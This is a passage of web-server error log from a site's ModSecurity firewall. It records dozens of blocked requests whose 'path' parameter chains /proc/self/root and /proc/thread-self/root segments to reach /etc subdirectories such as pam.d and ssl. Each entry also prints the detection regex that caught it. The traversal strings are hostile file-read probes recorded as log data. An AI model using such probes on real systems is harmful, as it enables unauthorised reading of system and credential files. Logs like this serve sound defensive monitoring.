[uri "/"] [unique_id "ablDPKBJNF7axNlVR0X5YQAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:13.642629 2026] [:error] [pid 7000:tid 140411557287680] [client 74.7.243.203:58016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDPRePVOt35XCGZP8sFwAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:15.793543 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.46:36434] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDPweiSKl8TjouI-b-2AAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:17.892712 2026] [:error] [pid 2305:tid 140411548894976] [client 74.7.241.46:57182] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDQQQohV2v-7oj5HH3XQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:04:17.894715 2026] [:error] [pid 7000:tid 140411716749056] [client 74.7.243.203:58020] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDQRePVOt35XCGZP8sGwAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:19.864076 2026] [:error] [pid 1961:tid 140411716749056] [client 74.7.241.46:55008] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDQ3RXaaWotPICgYshmQAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:04:20.709832 2026] [:error] [pid 1961:tid 140411641214720] [client 74.7.243.203:58036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDRHRXaaWotPICgYshnQAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:21.159750 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.46:55018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDRaBJNF7axNlVR0X5ZAAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:21.979856 2026] [:error] [pid 1961:tid 140411708356352] [client 74.7.243.203:34938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDRXRXaaWotPICgYshogAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:25.446038 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.243.203:34940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDSe82sZHvlq4xgHq_jQAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:28.062175 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.243.203:34946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDSpDEJR9VXonE_-1KVwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:29.353955 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.243.203:34948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDTQQohV2v-7oj5HH3YQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:30.525094 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.243.203:36154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDTgQohV2v-7oj5HH3YgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:31.819116 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:36168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDT-82sZHvlq4xgHq_jwAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:35.071688 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.203:36180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDUweiSKl8TjouI-b-3gAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:39.747462 2026] [:error] [pid 7000:tid 140411741927168] [client 74.7.243.203:36188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDVxePVOt35XCGZP8sIgAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:41.107088 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.243.203:56644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDWaBJNF7axNlVR0X5bAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:42.373306 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.243.203:56652] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDWlKJy4A1bGlmj9BSKQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:43.331128 2026] [:error] [pid 1961:tid 140411741927168] [client 74.7.241.46:55030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDW3RXaaWotPICgYsh9QAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:04:43.684959 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.243.203:56660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDW5DEJR9VXonE_-1KWwAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:47.177397 2026] [:error] [pid 2305:tid 140411641214720] [client 74.7.243.203:56676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDXwQohV2v-7oj5HH3aQAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:04:49.515190 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.243.203:56686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablDYe82sZHvlq4xgHq_lAAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
